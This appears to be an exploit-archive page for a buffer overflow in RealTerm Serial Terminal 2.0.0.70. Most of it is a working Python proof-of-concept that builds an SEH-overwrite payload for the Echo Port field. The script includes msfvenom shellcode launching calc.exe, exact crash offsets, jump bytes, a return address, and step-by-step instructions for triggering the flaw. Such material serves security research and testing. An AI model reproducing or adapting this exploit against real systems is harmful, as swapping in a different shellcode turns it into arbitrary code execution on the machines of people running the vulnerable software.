RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

RealTerm Serial Terminal version 2.0.0.70 suffers from an echo port buffer overflow vulnerability. Modifications to the original proof of concept include the fact that it uses a larger payload size for shellcode due to different jump offsets and filters the bad character 0x3a as this is the character for port which causes an error ":".


MD5 | 9b31bdb38b680b223198f700a17dcfa6

#!/usr/bin/python

# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH)
# Version: 2.0.0.70
# Credits to: Alejandra Sanchez for finding initial DoS
# https://www.exploit-db.com/exploits/46391
# Matteo Malvica for creating initial PoC
# https://www.exploit-db.com/exploits/46441
# Differences: - Uses a larger space for shellcode, 260 bytes, due to more precise jumping and less NOP padding
# - Filtered on char 0x3a representing ":", which causes "Invalid port" error in program
# Date: 06-03-2019
# Author: Hodorsec ([email protected] / [email protected])
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Tested on: Win7 x86 SP1 build 7601, Win8 6.3 build 9600
# Caveats: SEHOP disabled in registry, although this is also true for PoC EDB-ID 46441 since the PoC wouldn't work otherwise

# 1.- Run the python script it will create a new file as indicated by "filename" variable
# 2.- Copy the content of the created file to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On'
# 8.- Result

import sys, struct

filename = "sploit_realterm_custom-calc_x86.txt"

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -a x86 --platform windows -v shellcode -f python -b "\x0a\x0d\x00\x3a\x20"
# Payload size: 220 bytes
shellcode = ""
shellcode += "\xbf\x83\xe7\x1e\x48\xd9\xec\xd9\x74\x24\xf4\x58"
shellcode += "\x33\xc9\xb1\x31\x31\x78\x13\x03\x78\x13\x83\xc0"
shellcode += "\x87\x05\xeb\xb4\x6f\x4b\x14\x45\x6f\x2c\x9c\xa0"
shellcode += "\x5e\x6c\xfa\xa1\xf0\x5c\x88\xe4\xfc\x17\xdc\x1c"
shellcode += "\x77\x55\xc9\x13\x30\xd0\x2f\x1d\xc1\x49\x13\x3c"
shellcode += "\x41\x90\x40\x9e\x78\x5b\x95\xdf\xbd\x86\x54\x8d"
shellcode += "\x16\xcc\xcb\x22\x13\x98\xd7\xc9\x6f\x0c\x50\x2d"
shellcode += "\x27\x2f\x71\xe0\x3c\x76\x51\x02\x91\x02\xd8\x1c"
shellcode += "\xf6\x2f\x92\x97\xcc\xc4\x25\x7e\x1d\x24\x89\xbf"
shellcode += "\x92\xd7\xd3\xf8\x14\x08\xa6\xf0\x67\xb5\xb1\xc6"
shellcode += "\x1a\x61\x37\xdd\xbc\xe2\xef\x39\x3d\x26\x69\xc9"
shellcode += "\x31\x83\xfd\x95\x55\x12\xd1\xad\x61\x9f\xd4\x61"
shellcode += "\xe0\xdb\xf2\xa5\xa9\xb8\x9b\xfc\x17\x6e\xa3\x1f"
shellcode += "\xf8\xcf\x01\x6b\x14\x1b\x38\x36\x72\xda\xce\x4c"
shellcode += "\x30\xdc\xd0\x4e\x64\xb5\xe1\xc5\xeb\xc2\xfd\x0f"
shellcode += "\x48\x3c\xb4\x12\xf8\xd5\x11\xc7\xb9\xbb\xa1\x3d"
shellcode += "\xfd\xc5\x21\xb4\x7d\x32\x39\xbd\x78\x7e\xfd\x2d"
shellcode += "\xf0\xef\x68\x52\xa7\x10\xb9\x31\x26\x83\x21\x98"
shellcode += "\xcd\x23\xc3\xe4"

# Maximum length
maxlen = 1000

# Crash offsets
crash_nseh = 268
crash_seh = crash_nseh + 4

# JMP offset
ret_jmp = 262

# Padding
pad = "\x90" * 2

# Variables
prefix = pad # Initial padding
prefix += shellcode # Custom shellcode, max size 260 bytes
prefix += "B" * (ret_jmp - len(prefix)) # Filler until return point of negative jump
prefix += "\xE9\xF7\xFE\xFF\xFF" # JMP 0xFFFFFEFC # Jmp to beginning of buffer
prefix += "C" * (crash_nseh - len(prefix)) # Filler until return point of NSEH negative jump
nseh = "\xeb\xf8\x90\x90" # JMP SHORT 0x8 # NOP # NOP
seh = struct.pack("<L", 0x00406e27) # pop ecx # pop ebp # ret 0x04 # realterm.exe
suffix = "D" * (maxlen - len(prefix + nseh + seh)) # Just filling

# Constructing payload
payload = prefix + nseh + seh + suffix

f = open(filename, 'wb')
f.write(payload)
f.close()


Related Posts